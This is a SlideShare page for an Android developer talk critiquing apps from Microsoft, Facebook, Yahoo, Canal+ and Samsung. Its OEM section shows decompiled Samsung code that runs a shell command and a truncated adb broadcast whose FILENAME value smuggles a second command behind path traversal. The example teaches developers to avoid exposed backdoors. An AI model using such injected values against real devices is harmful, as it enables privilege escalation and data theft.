PLAY STORE BASHING
LEARN FROM THE BIGGEST
FAILS
Eyal LEZMY

SLIDES

http://bit.ly/andbigfails
http://eyal.fr
01

IT ALL STARTS ON THE
PLAY STORE
MINIMISE PERMISSIONS

Users should
prefer apps
requesting the
least
permissions

Request only what your app
requires
1/3 o...
MINIMISE PERMISSIONS

Users should
prefer apps
requesting the
least
permissions

You don’t need permission
Use ContentProv...
MINIMISE PERMISSIONS

Permission are not required to
launch another activity that has
the permission
MINIMISE PERMISSIONS

Need a
contact?
MINIMISE PERMISSIONS

Use the force,
Luke
MINIMISE PERMISSIONS
Start the contact app

Intent intent = new Intent(Intent.ACTION_GET_CONTENT);
intent.setType(Phone.CO...
MINIMISE PERMISSIONS
Start the contact app

Intent intent = new Intent(Intent.ACTION_GET_CONTENT);
intent.setType(Phone.CO...
MINIMISE PERMISSIONS

Need an
UUID?
MINIMISE PERMISSIONS

Need an
UUID?

TelephonyManager.getDeviceId()
Requires READ_PHONE_STATE permission
MINIMISE PERMISSIONS

Need an
UUID?

TelephonyManager.getDeviceId()
Requires READ_PHONE_STATE permission

Settings.Secure....
MINIMISE PERMISSIONS

Need an
UUID?

TelephonyManager.getDeviceId()
Requires READ_PHONE_STATE permission

Settings.Secure....
MINIMISE PERMISSIONS

Need an
UUID?

Generate your own UUID and use
Backup API !
String id = UUID.randomUUID().
toString()...
MINIMISE PERMISSIONS

Need an
UUID?

Generate your own UUID and use
Backup API !
String id = UUID.randomUUID().
toString()...
MINIMISE PERMISSIONS

Android Backup API
· API is available on all Android devices.
· Manufacturors can implements their o...
02

MICROSOFT STORY EPISODE 1
?

?

?
LOOK AND FEEL

HOTMAIL

OUTLOOK.COM
LOOK AND FEEL

SAME!

HOTMAIL

OUTLOOK.COM
LOOK AND FEEL

FOLLOW THE GUIDELINES!
http://d.android.com/design
LOOK AND FEEL

Redesigned by Taylor Ling
LOOK AND FEEL

By Microsoft
LOOK AND FEEL
LOOK AND FEEL
LOOK AND FEEL

FOLLOW THE GUIDELINES!
http://d.android.com/design
LOOK AND FEEL

PLEASE!

FOLLOW THE GUIDELINES!
http://d.android.com/design
03

MICROSOFT STORY EPISODE 2
XBOX MUSIC
XBOX MUSIC
Emulator
(last devices configuration)
XBOX MUSIC
Emulator
(last devices configuration)
Nexus 7
S4
Nexus 10

Mega
XBOX MUSIC
Emulator
(last devices configuration)
Nexus 7
S4
Nexus 10

Mega

XCover (Android 2.3)
XBOX MUSIC
Emulator
(last devices configuration)
Nexus 7
S4
Nexus 10

Mega

XCover (Android 2.3)

Tablets
XBOX MUSIC
Emulator
(last devices configuration)
Nexus 7
S4
Nexus 10
Note 2
S3
Mega
Galaxy Nexus
Note 1
XCover (Android 2....
XBOX MUSIC

Brand New devices

Our
Nutshell

S4, Mega, HTC One, Xperia Z, ...

Tablets
Nexus 7/10, Tab2, Tab3, Note 10.1, ...
XBOX MUSIC

Main stream devices

Our
Nutshell

S3, Galaxy Nexus, Note2, Note1, ...

Compatible
XBOX MUSIC

The dark side
of the force,
Luke
XBOX MUSIC

Let’s look
into the
Manifest
XBOX MUSIC

<uses-sdk android:minSdkVersion="
14"
android:targetSdkVersion="
14" />
XBOX MUSIC

Exclude the old devices

<uses-sdk android:minSdkVersion="
14"
android:targetSdkVersion="
14" />
XBOX MUSIC

Exclude the old devices

<uses-sdk android:minSdkVersion="
14"
android:targetSdkVersion="
14" />

Not recommen...
XBOX MUSIC

<compatible-screens>
<screen android:screenSize="small" android:screenDensity="ldpi" />
<screen android:screen...
XBOX MUSIC

<compatible-screens>
<screen android:screenSize="small" android:screenDensity="ldpi" />
<screen android:screen...
XBOX MUSIC

<compatible-screens>
<screen android:screenSize="small" android:screenDensity="ldpi" />
<screen android:screen...
XBOX MUSIC

<compatible-screens>
<screen android:screenSize="small" android:screenDensity="ldpi" />
<screen android:screen...
XBOX MUSIC

<
>

“You should not use this element”
It can dramatically reduce the potential user base
for your application...
XBOX MUSIC

<
>

compatible-screens

It does not accept xxhdpi
But you can instead specify 480 as the value
XBOX MUSIC

Nothing seems tricky...
XBOX MUSIC

XXHDPI
7.7% of Android devices

XXHDPI
XBOX MUSIC

Tablets
11.2% of Android devices

XXHDPI
XBOX MUSIC

Missing targets
18,9% of the market

XXHDPI
XBOX MUSIC

The
Mistakes

Have they tested on new devices?
Ignoring the power users
Brand new devices are bought by power ...
XBOX MUSIC

Return of the
APK
XBOX MUSIC

A day after
XBOX MUSIC

A day after
They updated
the app
XBOX MUSIC

<uses-sdk android:minSdkVersion="
14"
android:targetSdkVersion="
18" />

<supports-screens
android:smallScreen...
XBOX MUSIC

<uses-sdk android:minSdkVersion="
14"
android:targetSdkVersion="
18" />

<supports-screens
android:smallScreen...
04

MICROSOFT STORY EPISODE 3
MICROSOFT OFFICE

Follows the guidelines… This time
MICROSOFT OFFICE

Not that bad
But it could be better
MICROSOFT OFFICE

Fight the
confusion

Office 365 offer is quite confusing
People used to buy Office licenses, not to
subs...
MICROSOFT OFFICE
MICROSOFT OFFICE

The title is clear
MICROSOFT OFFICE

Is it enough explicit?
MICROSOFT OFFICE

Does not support tablet format

Problem

A producting app has to be compatible with big
screens formats
MICROSOFT OFFICE

Does not support tablet format

Problem

A producting app has to be compatible with big
screens formats
...
MICROSOFT OFFICE

Other
problems

Less features than the competitors
Does not support local files
Does not support edition...
MICROSOFT OFFICE

Adapt your UI to screen sizes
depending on your features

Conclusion
Differenciate your service from
com...
MICROSOFT OFFICE

One more
thing!
MICROSOFT OFFICE

Check out
the
Manifest
MICROSOFT OFFICE

<uses-sdk android:minSdkVersion="14"
android:targetSdkVersion="16" />

<uses-permission android:name="an...
MICROSOFT OFFICE

<uses-sdk android:minSdkVersion="14"
android:targetSdkVersion="16" />
They support ICS+

<uses-permissio...
MICROSOFT OFFICE

<uses-sdk android:minSdkVersion="14"
android:targetSdkVersion="16" />
They support ICS+

<uses-permissio...
MICROSOFT OFFICE

Accepts READ_LOGS
38% of the supported devices

XXHDPI
Ignore READ_LOGS
Jelly Bean removed this feature
MICROSOFT OFFICE

Don’t do
this

Why scaring 100% of your users?
To use a feature with 38% of them

Avoid using deprecated...
05

YAHOO! WEATHER
YAHOO WEATHER

Beautiful...
YAHOO WEATHER

Very good score
YAHOO WEATHER

Is it
perfect?

Hell no!
YAHOO WEATHER

« Try not.
Do.
Or do not.
There is no try. »
YAHOO WEATHER

« Try not.
Do.
Or do not.
There is no try. »
YODA
YAHOO WEATHER

A splashscreen
YAHOO WEATHER

Non native UI
YAHOO WEATHER

Non native UI
YAHOO WEATHER

Where is my
status bar?
YAHOO WEATHER

Hide
status bar

Show
status bar

Immersive experience

Multitasking

Games, Books, Videos

Everything else
YAHOO WEATHER

When do
you check
the
weather?

Morning?
- Choosing your clothes
- Eating your breakfast
- Checking your em...
YAHOO WEATHER

When do
you check
the
weather?

Morning?
- Choosing your clothes
- Eating your breakfast
- Checking your em...
YAHOO WEATHER

Youtube
An immersive app

No status bar
YAHOO WEATHER

It allows multitasking
Inside the app

Playing video
YAHOO WEATHER
Samsung Video Player
YAHOO WEATHER
Samsung Video Player
Popup play
YAHOO WEATHER

About the
context you
have to think
06

FACEBOOK EPISODE 1
FACEBOOK

Under the
hood

Too much methods
LinearAlloc buffer overflow

March 2013

Solution is to divide the code into
se...
FACEBOOK

Under the
hood
March 2013

Facebook app source code was not
enough modular to allow this at
application level
“T...
FACEBOOK

« More backwards compatibility for
Facebook.
Another day, another private field
accessed. »
FACEBOOK

« More backwards compatibility for
Facebook.
Another day, another private field
accessed. »
GIT COMMENT
ANDROID ...
FACEBOOK

Android source code - DexPathList.java
Commit January 2013

/**
* List of dex/resource (class path) elements.
* ...
FACEBOOK
Android code review
January 2013

Patch set 2

lets facebook start (at least judging by logcat output)

After man...
FACEBOOK

This was
not enough

They finally patched Dalvik VM
Using native hot fix to change the LinearAlloc buffer
size
FACEBOOK

I feel dirty
FACEBOOK

In a
nutshell

Modularity saves lifes
Google seems to test some popular
apps during integration
So they don’t br...
07

FACEBOOK EPISODE 2
FACEBOOK HOME

A lock screen
FACEBOOK HOME

Several services supported
FACEBOOK HOME

And a launcher
FACEBOOK HOME
FACEBOOK HOME

The
problem

The launcher is too simple
No folder
No widget
No dock (during first months)

It used to be ma...
FACEBOOK HOME
FACEBOOK HOME
FACEBOOK HOME

Opens default
launcher
FACEBOOK HOME

Spot the odd one out
FACEBOOK HOME

Conclusion

Keep the platform spirit
To override native OS elements you need first to
implement all the bas...
08

CANAL PLUS
CANAL+ TOUCH
This is the logcat

Request: https://canalURL.com/1.5/getThmChannel.php...
Request: https://canalURL.com/1.5/...
CANAL+ TOUCH

Chatty logs

Make reverse engineering easier
HTTPS connexion
PHP backend
All the URLS and parameters are kno...
CANAL+ TOUCH

Chatty logs

Can bring really big security
breaches
CANAL+ TOUCH

This is always the logcat

https://canalURL.com/1.5/authentification.php?
login=[MY_LOGIN]&pass=[MY_CLEAR_PA...
CANAL+ TOUCH

This is always the logcat

Wait
login=[MY_LOGIN]&pass=[MY_CLEAR_PASSWORD]...
WHAT ?!

https://canalURL.com/1...
CANAL+ TOUCH

Shut the
fuck up!

Control your log output
Easy method with BuildConfig.DEBUG

Never send clear password ove...
CANAL+ TOUCH

public static final boolean SHOW_LOG = BuildConfig.DEBUG;

public static void d(final String tag, final Stri...
CANAL+ TOUCH

public static final boolean SHOW_LOG = BuildConfig.DEBUG;

public static void d(final String tag, final Stri...
09

OEM SOFTWARE
OEM SOFTWARE

The
Android
framework

Many APKs
Implement the features

Often have system access
To use low level features
OEM SOFTWARE

Open bar?
OEM SOFTWARE

Let’s see
OEM SOFTWARE

Android OEM
applications
(in)security
Talk by ANDRE MOULU
Quarkslab
OEM SOFTWARE

Methodology

Reverse engineering
Using Androguard

A custom result environment
Manifest analysis
Check for s...
OEM SOFTWARE

The results
on Samsung
devices

12 vulnerabilities found
Leak personal information
Access non-permited featu...
OEM SOFTWARE

Gimme
more!
OEM SOFTWARE

Search for

sharedUserId = system
Sensitive user ID

Command execution
Sensitive usage

Find serviceModeApp....
OEM SOFTWARE

<receiver name=".FTATDumpReceiver">
<intent-filter>
<action name="com.android.sec.FTAT_DUMP"></action>
</int...
OEM SOFTWARE

<receiver name=".FTATDumpReceiver">
<intent-filter>
<action name="com.android.sec.FTAT_DUMP"></action>
</int...
OEM SOFTWARE

<receiver name=".FTATDumpReceiver">
<intent-filter>
<action name="com.android.sec.FTAT_DUMP"></action>
</int...
OEM SOFTWARE
public void onReceive(Context paramContext, Intent
paramIntent) {
String str1 = paramIntent.getAction();
if (...
OEM SOFTWARE
public void onReceive(Context paramContext, Intent
paramIntent) {
String str1 = paramIntent.getAction();
if (...
OEM SOFTWARE
public void onReceive(Context paramContext, Intent
paramIntent) {
String str1 = paramIntent.getAction();
if (...
OEM SOFTWARE
public void onReceive(Context paramContext, Intent
paramIntent) {
String str1 = paramIntent.getAction();
if (...
OEM SOFTWARE
public void onReceive(Context paramContext, Intent
paramIntent) {
String str1 = paramIntent.getAction();
if (...
OEM SOFTWARE
public void onReceive(Context paramContext, Intent
paramIntent) {
String str1 = paramIntent.getAction();
if (...
OEM SOFTWARE
public void onReceive(Context paramContext, Intent
paramIntent) {
String str1 = paramIntent.getAction();
if (...
OEM SOFTWARE

public int onStartCommand(Intent paramIntent, ...){
final String str = paramIntent.getStringExtra("FILENAME"...
OEM SOFTWARE

public int onStartCommand(Intent paramIntent, ...){
final String str = paramIntent.getStringExtra("FILENAME"...
OEM SOFTWARE

public int onStartCommand(Intent paramIntent, ...){
final String str = paramIntent.getStringExtra("FILENAME"...
OEM SOFTWARE

public int onStartCommand(Intent paramIntent, ...){
final String str = paramIntent.getStringExtra("FILENAME"...
OEM SOFTWARE

private boolean DoShellCmd(String paramString){
[...]
String[] arrayOfString = new String[3];
arrayOfString[...
OEM SOFTWARE

private boolean DoShellCmd(String paramString){
[...]
String[] arrayOfString = new String[3];
arrayOfString[...
OEM SOFTWARE

private boolean DoShellCmd(String paramString){
[...]
String[] arrayOfString = new String[3];
arrayOfString[...
OEM SOFTWARE

private boolean DoShellCmd(String paramString){
[...]
String[] arrayOfString = new String[3];
arrayOfString[...
OEM SOFTWARE

Access to

All permissions declared by
system apps
156 for this case

All files belonging to system user
Wif...
OEM SOFTWARE

$ adb shell am broadcast -a com.android.sec.FTAT_DUMP
--es FILENAME '../../../../../dev/null;
/system/bin/pm...
OEM SOFTWARE

$ adb shell am broadcast -a com.android.sec.FTAT_DUMP
--es FILENAME '../../../../../dev/null;
/system/bin/pm...
OEM SOFTWARE

$ adb shell am broadcast -a com.android.sec.FTAT_DUMP
--es FILENAME '../../../../../dev/null;
/system/bin/pm...
OEM SOFTWARE

$ adb shell am broadcast -a com.android.sec.FTAT_DUMP
--es FILENAME '../../../../../dev/null;
/system/bin/pm...
OEM SOFTWARE

Open bar!
OEM SOFTWARE

Moral of
the story

It happens at application level
Look after your app’s backdoors
Don’t export local servi...
Thank You for your time !

SLIDES
http://bit.ly/andbigfails

http://eyal.fr
PlayStore bashing: learn from the biggest fails on the Google Play Store
PlayStore bashing: learn from the biggest fails on the Google Play Store
PlayStore bashing: learn from the biggest fails on the Google Play Store
PlayStore bashing: learn from the biggest fails on the Google Play Store
PlayStore bashing: learn from the biggest fails on the Google Play Store
PlayStore bashing: learn from the biggest fails on the Google Play Store
PlayStore bashing: learn from the biggest fails on the Google Play Store
PlayStore bashing: learn from the biggest fails on the Google Play Store
PlayStore bashing: learn from the biggest fails on the Google Play Store
Upcoming SlideShare
Loading in …5
×

PlayStore bashing: learn from the biggest fails on the Google Play Store

498 views

Published on

Slides with speaker notes can be found here: http://bit.ly/andbigfails

Microsoft, Facebook, Yahoo, ... They are huge firms that are also big Android editors. During this presentation we will discover together the stories of big editors that published apps on the PlayStore (or not) that failed to satisfiy the users or the Android guidelines. To learn from their mistakes.

0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
498
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
9
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

PlayStore bashing: learn from the biggest fails on the Google Play Store

  1. 1. PLAY STORE BASHING LEARN FROM THE BIGGEST FAILS
  2. 2. Eyal LEZMY SLIDES http://bit.ly/andbigfails http://eyal.fr
  3. 3. 01 IT ALL STARTS ON THE PLAY STORE
  4. 4. MINIMISE PERMISSIONS Users should prefer apps requesting the least permissions Request only what your app requires 1/3 of apps request more permissions than they need
  5. 5. MINIMISE PERMISSIONS Users should prefer apps requesting the least permissions You don’t need permission Use ContentProviders
  6. 6. MINIMISE PERMISSIONS Permission are not required to launch another activity that has the permission
  7. 7. MINIMISE PERMISSIONS Need a contact?
  8. 8. MINIMISE PERMISSIONS Use the force, Luke
  9. 9. MINIMISE PERMISSIONS Start the contact app Intent intent = new Intent(Intent.ACTION_GET_CONTENT); intent.setType(Phone.CONTENT_ITEM_TYPE); startActivityForResult(intent, MY_REQUEST_CODE); void onActivityResult(int requestCode, int resultCode, Intent data) { if (data != null) { Uri uri = data.getData(); if (uri != null) { Cursor c = getContentResolver().query(uri, new String[] {Contacts.DISPLAY_NAME, Phone.NUMBER}, null, null, null);} } } }
  10. 10. MINIMISE PERMISSIONS Start the contact app Intent intent = new Intent(Intent.ACTION_GET_CONTENT); intent.setType(Phone.CONTENT_ITEM_TYPE); startActivityForResult(intent, MY_REQUEST_CODE); void onActivityResult(int requestCode, int resultCode, Intent data) { if (data != null) { Uri uri = data.getData(); if (uri != null) { Cursor c = getContentResolver().query(uri, new String[] {Contacts.DISPLAY_NAME, Phone.NUMBER}, null, null, null);} } } } Handle the result
  11. 11. MINIMISE PERMISSIONS Need an UUID?
  12. 12. MINIMISE PERMISSIONS Need an UUID? TelephonyManager.getDeviceId() Requires READ_PHONE_STATE permission
  13. 13. MINIMISE PERMISSIONS Need an UUID? TelephonyManager.getDeviceId() Requires READ_PHONE_STATE permission Settings.Secure.ANDROID_ID Reset at every wipe Not applicable on multi user environment
  14. 14. MINIMISE PERMISSIONS Need an UUID? TelephonyManager.getDeviceId() Requires READ_PHONE_STATE permission Settings.Secure.ANDROID_ID Reset at every wipe Not applicable on multi user environment NO!
  15. 15. MINIMISE PERMISSIONS Need an UUID? Generate your own UUID and use Backup API ! String id = UUID.randomUUID(). toString();
  16. 16. MINIMISE PERMISSIONS Need an UUID? Generate your own UUID and use Backup API ! String id = UUID.randomUUID(). toString(); YES!
  17. 17. MINIMISE PERMISSIONS Android Backup API · API is available on all Android devices. · Manufacturors can implements their own transport and storage for the API · Each device as its own backup data · A new device will take a backup from a device associated with your google account. · IT'S NOT A SYNC API !
  18. 18. 02 MICROSOFT STORY EPISODE 1
  19. 19. ? ? ?
  20. 20. LOOK AND FEEL HOTMAIL OUTLOOK.COM
  21. 21. LOOK AND FEEL SAME! HOTMAIL OUTLOOK.COM
  22. 22. LOOK AND FEEL FOLLOW THE GUIDELINES! http://d.android.com/design
  23. 23. LOOK AND FEEL Redesigned by Taylor Ling
  24. 24. LOOK AND FEEL By Microsoft
  25. 25. LOOK AND FEEL
  26. 26. LOOK AND FEEL
  27. 27. LOOK AND FEEL FOLLOW THE GUIDELINES! http://d.android.com/design
  28. 28. LOOK AND FEEL PLEASE! FOLLOW THE GUIDELINES! http://d.android.com/design
  29. 29. 03 MICROSOFT STORY EPISODE 2
  30. 30. XBOX MUSIC
  31. 31. XBOX MUSIC Emulator (last devices configuration)
  32. 32. XBOX MUSIC Emulator (last devices configuration) Nexus 7 S4 Nexus 10 Mega
  33. 33. XBOX MUSIC Emulator (last devices configuration) Nexus 7 S4 Nexus 10 Mega XCover (Android 2.3)
  34. 34. XBOX MUSIC Emulator (last devices configuration) Nexus 7 S4 Nexus 10 Mega XCover (Android 2.3) Tablets
  35. 35. XBOX MUSIC Emulator (last devices configuration) Nexus 7 S4 Nexus 10 Note 2 S3 Mega Galaxy Nexus Note 1 XCover (Android 2.3) Tablets
  36. 36. XBOX MUSIC Brand New devices Our Nutshell S4, Mega, HTC One, Xperia Z, ... Tablets Nexus 7/10, Tab2, Tab3, Note 10.1, … Old devices XCover Not compatible
  37. 37. XBOX MUSIC Main stream devices Our Nutshell S3, Galaxy Nexus, Note2, Note1, ... Compatible
  38. 38. XBOX MUSIC The dark side of the force, Luke
  39. 39. XBOX MUSIC Let’s look into the Manifest
  40. 40. XBOX MUSIC <uses-sdk android:minSdkVersion=" 14" android:targetSdkVersion=" 14" />
  41. 41. XBOX MUSIC Exclude the old devices <uses-sdk android:minSdkVersion=" 14" android:targetSdkVersion=" 14" />
  42. 42. XBOX MUSIC Exclude the old devices <uses-sdk android:minSdkVersion=" 14" android:targetSdkVersion=" 14" /> Not recommended (sept. 2013)
  43. 43. XBOX MUSIC <compatible-screens> <screen android:screenSize="small" android:screenDensity="ldpi" /> <screen android:screenSize="small" android:screenDensity="mdpi" /> <screen android:screenSize="small" android:screenDensity="hdpi" /> <screen android:screenSize="small" android:screenDensity="xhdpi" /> <screen android:screenSize="normal" android:screenDensity="ldpi" /> <screen android:screenSize="normal" android:screenDensity="mdpi" /> <screen android:screenSize="normal" android:screenDensity="hdpi" /> <screen android:screenSize="normal" android:screenDensity="xhdpi" /> </compatible-screens>
  44. 44. XBOX MUSIC <compatible-screens> <screen android:screenSize="small" android:screenDensity="ldpi" /> <screen android:screenSize="small" android:screenDensity="mdpi" /> <screen android:screenSize="small" android:screenDensity="hdpi" /> <screen android:screenSize="small" android:screenDensity="xhdpi" /> <screen android:screenSize="normal" android:screenDensity="ldpi" /> <screen android:screenSize="normal" android:screenDensity="mdpi" /> <screen android:screenSize="normal" android:screenDensity="hdpi" /> <screen android:screenSize="normal" android:screenDensity="xhdpi" /> </compatible-screens> Exclude tablets
  45. 45. XBOX MUSIC <compatible-screens> <screen android:screenSize="small" android:screenDensity="ldpi" /> <screen android:screenSize="small" android:screenDensity="mdpi" /> <screen android:screenSize="small" android:screenDensity="hdpi" /> <screen android:screenSize="small" android:screenDensity="xhdpi" /> <screen android:screenSize="normal" android:screenDensity="ldpi" /> <screen android:screenSize="normal" android:screenDensity="mdpi" /> <screen android:screenSize="normal" android:screenDensity="hdpi" /> <screen android:screenSize="normal" android:screenDensity="xhdpi" /> </compatible-screens> Exclude tablets Exclude brand new devices (XXHDPI screens)
  46. 46. XBOX MUSIC <compatible-screens> <screen android:screenSize="small" android:screenDensity="ldpi" /> <screen android:screenSize="small" android:screenDensity="mdpi" /> <screen android:screenSize="small" android:screenDensity="hdpi" /> <screen android:screenSize="small" android:screenDensity="xhdpi" /> <screen android:screenSize="normal" android:screenDensity="ldpi" /> <screen android:screenSize="normal" android:screenDensity="mdpi" /> <screen android:screenSize="normal" android:screenDensity="hdpi" /> <screen android:screenSize="normal" android:screenDensity="xhdpi" /> </compatible-screens> Exclude tablets Exclude brand new devices (XXHDPI screens) Too restrictive!
  47. 47. XBOX MUSIC < > “You should not use this element” It can dramatically reduce the potential user base for your application compatible-screens “Use it only as a last resort” When the application absolutely does not work with specific screen configurations “Instead, follow the guide to Supporting Multiple Screens”
  48. 48. XBOX MUSIC < > compatible-screens It does not accept xxhdpi But you can instead specify 480 as the value
  49. 49. XBOX MUSIC Nothing seems tricky...
  50. 50. XBOX MUSIC XXHDPI 7.7% of Android devices XXHDPI
  51. 51. XBOX MUSIC Tablets 11.2% of Android devices XXHDPI
  52. 52. XBOX MUSIC Missing targets 18,9% of the market XXHDPI
  53. 53. XBOX MUSIC The Mistakes Have they tested on new devices? Ignoring the power users Brand new devices are bought by power users and early adopters Does not support preloading music The app is not prefectly opimized for mobility. Why ignoring nomad devices like tablets?
  54. 54. XBOX MUSIC Return of the APK
  55. 55. XBOX MUSIC A day after
  56. 56. XBOX MUSIC A day after They updated the app
  57. 57. XBOX MUSIC <uses-sdk android:minSdkVersion=" 14" android:targetSdkVersion=" 18" /> <supports-screens android:smallScreens="true" android:normalScreens="true" android:largeScreens="false" android:xlargeScreens="false" />
  58. 58. XBOX MUSIC <uses-sdk android:minSdkVersion=" 14" android:targetSdkVersion=" 18" /> <supports-screens android:smallScreens="true" HURRAY android:xlargeScreens="false" /> !! android:normalScreens="true" android:largeScreens="false"
  59. 59. 04 MICROSOFT STORY EPISODE 3
  60. 60. MICROSOFT OFFICE Follows the guidelines… This time
  61. 61. MICROSOFT OFFICE Not that bad But it could be better
  62. 62. MICROSOFT OFFICE Fight the confusion Office 365 offer is quite confusing People used to buy Office licenses, not to subscribe to an Office service They try to avoid confusion
  63. 63. MICROSOFT OFFICE
  64. 64. MICROSOFT OFFICE The title is clear
  65. 65. MICROSOFT OFFICE Is it enough explicit?
  66. 66. MICROSOFT OFFICE Does not support tablet format Problem A producting app has to be compatible with big screens formats
  67. 67. MICROSOFT OFFICE Does not support tablet format Problem A producting app has to be compatible with big screens formats - The app is optimized for a phone - On tablet, you can use the Office Webapps - We plan to enable editing with Webapps Microsoft’s answer on PlayStore
  68. 68. MICROSOFT OFFICE Other problems Less features than the competitors Does not support local files Does not support edition The backend seems not very ready I have been stuck during 24 hours at the mobile activation, and I’m not alone
  69. 69. MICROSOFT OFFICE Adapt your UI to screen sizes depending on your features Conclusion Differenciate your service from competitors Especially when you are new on the market Your backend have to support your mobile distribution
  70. 70. MICROSOFT OFFICE One more thing!
  71. 71. MICROSOFT OFFICE Check out the Manifest
  72. 72. MICROSOFT OFFICE <uses-sdk android:minSdkVersion="14" android:targetSdkVersion="16" /> <uses-permission android:name="android.permission.READ_LOGS"/>
  73. 73. MICROSOFT OFFICE <uses-sdk android:minSdkVersion="14" android:targetSdkVersion="16" /> They support ICS+ <uses-permission android:name="android.permission.READ_LOGS"/>
  74. 74. MICROSOFT OFFICE <uses-sdk android:minSdkVersion="14" android:targetSdkVersion="16" /> They support ICS+ <uses-permission android:name="android.permission.READ_LOGS"/> Read sensitive log data
  75. 75. MICROSOFT OFFICE Accepts READ_LOGS 38% of the supported devices XXHDPI Ignore READ_LOGS Jelly Bean removed this feature
  76. 76. MICROSOFT OFFICE Don’t do this Why scaring 100% of your users? To use a feature with 38% of them Avoid using deprecated functions As much as possible
  77. 77. 05 YAHOO! WEATHER
  78. 78. YAHOO WEATHER Beautiful...
  79. 79. YAHOO WEATHER Very good score
  80. 80. YAHOO WEATHER Is it perfect? Hell no!
  81. 81. YAHOO WEATHER « Try not. Do. Or do not. There is no try. »
  82. 82. YAHOO WEATHER « Try not. Do. Or do not. There is no try. » YODA
  83. 83. YAHOO WEATHER A splashscreen
  84. 84. YAHOO WEATHER Non native UI
  85. 85. YAHOO WEATHER Non native UI
  86. 86. YAHOO WEATHER Where is my status bar?
  87. 87. YAHOO WEATHER Hide status bar Show status bar Immersive experience Multitasking Games, Books, Videos Everything else
  88. 88. YAHOO WEATHER When do you check the weather? Morning? - Choosing your clothes - Eating your breakfast - Checking your emails - Looking after your kids
  89. 89. YAHOO WEATHER When do you check the weather? Morning? - Choosing your clothes - Eating your breakfast - Checking your emails - Looking after your kids This is multitasking!
  90. 90. YAHOO WEATHER Youtube An immersive app No status bar
  91. 91. YAHOO WEATHER It allows multitasking Inside the app Playing video
  92. 92. YAHOO WEATHER Samsung Video Player
  93. 93. YAHOO WEATHER Samsung Video Player Popup play
  94. 94. YAHOO WEATHER About the context you have to think
  95. 95. 06 FACEBOOK EPISODE 1
  96. 96. FACEBOOK Under the hood Too much methods LinearAlloc buffer overflow March 2013 Solution is to divide the code into several dex files And load it on demand
  97. 97. FACEBOOK Under the hood March 2013 Facebook app source code was not enough modular to allow this at application level “Too many of our classes are accessed directly by the Android framework” They had to do it at system level, thanks to reflection “We needed to inject our secondary dex files directly into the system class loader”
  98. 98. FACEBOOK « More backwards compatibility for Facebook. Another day, another private field accessed. »
  99. 99. FACEBOOK « More backwards compatibility for Facebook. Another day, another private field accessed. » GIT COMMENT ANDROID SOURCE CODE January 2013
  100. 100. FACEBOOK Android source code - DexPathList.java Commit January 2013 /** * List of dex/resource (class path) elements. * Should be called pathElements, but the Facebook app uses reflection * to modify 'dexElements' (http://b/7726934). */ private final Element[] dexElements;
  101. 101. FACEBOOK Android code review January 2013 Patch set 2 lets facebook start (at least judging by logcat output) After manual testing facebook starts, though i don't have an account.
  102. 102. FACEBOOK This was not enough They finally patched Dalvik VM Using native hot fix to change the LinearAlloc buffer size
  103. 103. FACEBOOK I feel dirty
  104. 104. FACEBOOK In a nutshell Modularity saves lifes Google seems to test some popular apps during integration So they don’t break the system apps Google hires engineers when Facebook hires sculptors Inspired by Sayo Oladeji
  105. 105. 07 FACEBOOK EPISODE 2
  106. 106. FACEBOOK HOME A lock screen
  107. 107. FACEBOOK HOME Several services supported
  108. 108. FACEBOOK HOME And a launcher
  109. 109. FACEBOOK HOME
  110. 110. FACEBOOK HOME The problem The launcher is too simple No folder No widget No dock (during first months) It used to be mandatory Lockscreen + Launcher
  111. 111. FACEBOOK HOME
  112. 112. FACEBOOK HOME
  113. 113. FACEBOOK HOME Opens default launcher
  114. 114. FACEBOOK HOME Spot the odd one out
  115. 115. FACEBOOK HOME Conclusion Keep the platform spirit To override native OS elements you need first to implement all the basic features the user use to use Identify your weakest points And prepare how to limit their impact
  116. 116. 08 CANAL PLUS
  117. 117. CANAL+ TOUCH This is the logcat Request: https://canalURL.com/1.5/getThmChannel.php... Request: https://canalURL.com/1.5/getProgramThm.php... Request: https://canalURL.com/1.4/programRediff.php... Request: https://canalURL.com/1.5/VOD.php?release=1... json response : {"token":{"url":"http://download.... Request: https://canalURL.com/1.4/getChannel.php?SE... json response: {"token":{"url":"https://canalURL.... Request: https://canalURL.com/1.5/guideTvChannel.ph... Request: https://canalURL.com/1.5/programInfo.php?U... Request: https://canalURL.com/1.5/myTv.php?release=...
  118. 118. CANAL+ TOUCH Chatty logs Make reverse engineering easier HTTPS connexion PHP backend All the URLS and parameters are known Some of the response are known too
  119. 119. CANAL+ TOUCH Chatty logs Can bring really big security breaches
  120. 120. CANAL+ TOUCH This is always the logcat https://canalURL.com/1.5/authentification.php? login=[MY_LOGIN]&pass=[MY_CLEAR_PASSWORD]...
  121. 121. CANAL+ TOUCH This is always the logcat Wait login=[MY_LOGIN]&pass=[MY_CLEAR_PASSWORD]... WHAT ?! https://canalURL.com/1.5/authentification.php?
  122. 122. CANAL+ TOUCH Shut the fuck up! Control your log output Easy method with BuildConfig.DEBUG Never send clear password over the network NEVAAAAAAA!!!!
  123. 123. CANAL+ TOUCH public static final boolean SHOW_LOG = BuildConfig.DEBUG; public static void d(final String tag, final String msg) { if (SHOW_LOG) Log.d(tag, msg); } Avoid the leak, easily
  124. 124. CANAL+ TOUCH public static final boolean SHOW_LOG = BuildConfig.DEBUG; public static void d(final String tag, final String msg) { if (SHOW_LOG) Log.d(tag, msg); } Avoid the leak, easily And test it during QA
  125. 125. 09 OEM SOFTWARE
  126. 126. OEM SOFTWARE The Android framework Many APKs Implement the features Often have system access To use low level features
  127. 127. OEM SOFTWARE Open bar?
  128. 128. OEM SOFTWARE Let’s see
  129. 129. OEM SOFTWARE Android OEM applications (in)security Talk by ANDRE MOULU Quarkslab
  130. 130. OEM SOFTWARE Methodology Reverse engineering Using Androguard A custom result environment Manifest analysis Check for sensitive API usage Diff between OS version (to find patches)
  131. 131. OEM SOFTWARE The results on Samsung devices 12 vulnerabilities found Leak personal information Access non-permited features Silent SMS control Code injection ... Similar vulnerabilities on many constructors
  132. 132. OEM SOFTWARE Gimme more!
  133. 133. OEM SOFTWARE Search for sharedUserId = system Sensitive user ID Command execution Sensitive usage Find serviceModeApp.apk = Very sensitive app !
